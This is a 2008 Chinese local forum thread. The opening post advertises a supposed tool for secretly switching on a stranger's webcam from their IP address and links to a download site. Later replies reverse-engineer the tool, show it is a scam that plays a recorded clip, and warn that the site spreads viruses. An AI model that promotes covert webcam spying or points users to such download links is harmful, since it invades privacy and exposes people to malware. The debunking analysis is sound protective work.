枞阳二三事

 找回密码
 立即注册

QQ登录

只需一步,快速开始

快捷登录


查看: 20559|回复: 7

偷窥精灵:万人迷远程视频强制嗅探2.0

 关闭 [复制链接]

6

主题

116

回帖

1475

积分

三星会员

积分
1475
性别
保密
发表于 2008-3-2 10:34:14 | 显示全部楼层 |阅读模式
软件名字:  万人迷远程视频强制嗅探2.0 软件大小:  881 K  
应用平台:  WIN98/2000/XP/2003/VISTA等 软件语言:  简体中文
软件授权:  免费 发布时间:  2007.8 下载地址:http://www.goyer.cn/cf.asp?user_name=wayjp   
软件介绍
万人迷远程视频嗅探是一款远程视频强制连接的监控软件.不需要任何第三方通讯软件的支持,
直接强制与对方视频,对方是否同意,并不重要,因为是在对方不知情的情况进行的!
只要你知道对方的IP地址以及对方安装了摄像头,就能在对方不知情的情况下,打开对方视频了,数据高效传输到你的电脑,实时观看。
软件操作界面简洁友好,连接迅速,传输稳定!采用最新IsiNeu结构研发!
万人迷强制视软件,2007年5月开始研发,于11月13日研发成功,历时半年..
由于使用本软件随时涉及到个人隐私问题,本软件仅供学习和研究交流之用,如因使用而触犯法律,后果自负,本站及作者概不承担法律责任.
vod1.jpg
亲稚园孕婴童用品专卖店 2828222 2027377         http://www.qinzhiyuan.com.cn

837

主题

1万

回帖

1万

积分

荣誉会员

做好自己最重要

积分
16240

新人进步奖枞阳234社区帅哥勋章优秀斑竹奖爱心天使勋章灌水天才奖

QQ
性别
发表于 2008-3-2 11:34:48 | 显示全部楼层
真的假的啊。。。。。。。。。。。。。。

143

主题

1771

回帖

1万

积分

荣誉会员

  &nbsp

积分
10947

新人进步奖枞阳234社区帅哥勋章优秀斑竹奖幽默大师奖

性别
发表于 2008-3-2 13:12:00 | 显示全部楼层
引用第1楼蝎子于2008-03-02 11:34发表的  :
真的假的啊。。。。。。。。。。。。。。
我不是一班的人——二班的!!!

236

主题

2862

回帖

2万

积分

网站版主

并无个性;何须签名?

Rank: 7Rank: 7Rank: 7

积分
22104

爱心天使勋章

性别
发表于 2008-3-2 17:47:37 | 显示全部楼层
哈哈```
我相信``
因为我有研究过``
不过没什么意思```
不好玩``` [s:7]

41

主题

657

回帖

1万

积分

五星会员

积分
18588
性别
发表于 2008-3-5 11:49:10 | 显示全部楼层
骗子软件(远程视频嗅探器)算法分析

可笑的“远程视频嗅探器”

前两天剑哥问起我是否能够破解一个名叫"远程视频嗅探器"的软件,传说可以在不经过对方的同意的情况下就直接看对方视频,并且这个软件是共享软件,需要注册后才能"查看"远程视频,注册的方法也很简单,用不同的IP访问这个软件的"官方网站"100次,可怜而且厚道的剑哥竟然真的通过断开连接ADSL 100次进行了访问,结果仍然是注册失败(在这里对剑哥表示严重的友情同情),通过在Google搜索"远程视频嗅探器"。发现有很多论坛都有人在发同样的帖子和网址,勾引人们访问,网址是大家熟悉的 http://www.不蒙你蒙谁.cn/id=王二驴子 这种形式(太木有创意,让人一看就不想访问)。本人首先对这种"技术"的出现表现了惊诧,继而感到有些佩服,真的能实现单方面远程强行开启对方视频,那所谓的网络安全还有个鸟用?于是非常有兴致的表示想研究一下,剑哥将压缩包发给我。解压后发现有如下5个文件: 远程视频嗅探器.exe Camera.dll netdrv.dll vk.dll 说明.txt 其中"说明.txt"内容如下:本软件可以在不使用任何第三方通讯软件的前提下,直接看到对方视频。只要您知道对方的IP,对方安装了网络摄像头。很简单的操作,直接在软件的正下放输入对方IP地址,就能在对方不知情的情况下打开对方将的网络摄像头,远程视频直接发送到您的电脑里。时实观看远程视频。 本软件涉及到个人隐私问题,仅供学习和研究使用。请广大网友不要用与非法途径,如因为使用本软件触犯法律,本站概不负责。 www.***jw.cn 远程视频嗅探 想看更多美女可以访问www.***sw.cn 看这说明,尽管有一些错别字,但其中表达的意思还是很牛B的。于是开始简单分析。首先习惯*的用卡巴杀了毒,木有报警。从文件名上来判断,远程视频嗅探器.exe是主执行文件,Camera.dll可以看作是和摄像头有关的一些函数封装,netdrv.dll可以看作是网络驱动有关的函数封装。 首先分析这三个Dll文件,通过ExeScope查看导出函数列表,发现Camera.dll文件有如下导出函数: 应该是一个MD5的导出类,但是文件名起个Camera.dll,多少有点文不对题,不过这也可以理解,很多程序员不希望别人猜出他程序的模块组成,名字可以乱起的。再看资源中,有自定义类型"DRV"的资源两个,一个的ID是6000,先将其导出为drv6000.dat(这个文件是重点),另一个ID是6001,文件头是"Microsoft C/C++ program database 2.0"什么什么的,暂时没有猜出是干什么用的。另外还有一个自定义类型为"GA"的ID是6002的资源,文件头和6001的一样,暂时略过。 再看netdrv.dll文件,没有导出函数,只有三个自定义的资源,一个是类型为"CA"的ID为7003的,文件头是"MZ",这应该是一个EXE和Dll这种可执行文件,于是将其导出为ca7003.exe,还有一个类型为"IM"的ID为7004的资源,文件内容比较乱,文件内容如十分象是一个汉字码表,用ASCII码为0x02的字符隔开了,这有虾米用处呢,实在奇怪。第三个资源是类型为"NET"的ID为7002的资源,文件头也是"MZ",没啥说的,直接另存为net7002.exe(这时发现net7002.exe的图标和远程视频嗅探器.exe的图标一样,大小也相符,不过文件内容稍有差异) 最后看看vk.dll文件,6.86KB,ExeScope认为不是一个合法的Dll或EXE文件,于是用UltraEdit将其打开,文件内容部分"DQogICAgyP3Krr7FvdrKp7b4uLS1ww0KDQogICAg",貌似64进制编码,通过解码后那些内容把偶笑坏了,部分正如下三十九节失而复得"姐姐,姐姐。"姚君武大呼小叫的冲进了病房。。。汗。。这是什么玩意?通过Google搜索才知道,这是小说《纨绔才子》的一部分,呵呵,真是搞笑。 回头看"远程视频嗅探器.exe",资源中也有几个自定义的,一个是类型为"DRIVE"的ID为134,另存为drive134.dat(这个文件很有意思,和上面的drv6000.dat有异曲同工之处),经过比对发现和drv6000.dat文件一模一样,用UltraEdit打开后发现文件头是"FWS",熟悉Flash的朋友可能知道这是什么文件了。呵呵,将后缀更名为swf,用播放器或IE打开,哈哈哈哈,原来是录制的一段视频,有号称是两个“美女”在镜头前活动的一段录像。 结合剑哥访问100次网站不能注册这个问题,再通过对这个“软件”的分析,可以大概看出,这应该是个比较搞笑的骗局,即使有人真的通过100次点击得到了注册码经过"注册"以后,主程序将资源中的SWF视频释放出来,再通过界面上的"远程视频窗口"播放出来,让使用者以为真的是看到了对方的视频,等视频播放完以后(很短的一截),再来个"网络故障,连接断开"之类的错误或者重复播放这个假视频文件让使用者蒙在鼓里。呵呵。创意不错,可惜细节上不太完美。不过尽管如此,这个"软件"应该是获得了成功,为其"官方网站"获得了不少的流量,听说第一个通过赠送6位QQ的骗局增加流量的网站居然进了Alxea前100就可以知道,网络的力量是很恐怖的。 将这个故事写出来,木有他意。网络Bao4民横行的时代,低调才是王道。 感谢剑哥,感谢西西TV,感谢那个骗人创意不错但细节不完美的XX软件和XX网站。


1、注册码要求为35位,不为注册码则提示位数不对,
2、通过C库函数MSVCRT.isdigit返回值较验注册码是否为数字,是数字则取下一位
3、较验注册码是否为大小写字母,是则取下一位,一直到取完,然后提示你无效的注册码,
4、若注册码即不是字母也不是数字,直接提示你有非法字符
5、软件注册码不存在,纯属骗人的软件
出生我们无法选择 今后的路自己作主

4

主题

53

回帖

631

积分

三星会员

积分
631
性别
保密
发表于 2008-3-5 13:28:22 | 显示全部楼层
骗人的,还好没去试,呵
关注枞阳人,了解枞阳事,欢迎访问《枞阳二三事》。

0

主题

2

回帖

2

积分

新手入门

积分
2
性别
保密
发表于 2008-4-1 10:40:51 | 显示全部楼层
注册码http://www.goyer.cn/就是这个网,别去,有病毒他们现在又改为www.GooTon.cn 万人迷官方网,都全是骗人的,千万别去|
关注枞阳人,了解枞阳事,欢迎访问《枞阳二三事》。

0

主题

2

回帖

2

积分

新手入门

积分
2
性别
保密
发表于 2008-4-1 10:42:19 | 显示全部楼层
http://www.goyer.cn/就是这个网,别去,有病毒他们现在又改为www.GooTon.cn 万人迷官方网,都全是骗人的,千万别去|,你推广500都没有用,他们就是为了骗你的点击次数
关注枞阳人,了解枞阳事,欢迎访问《枞阳二三事》。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表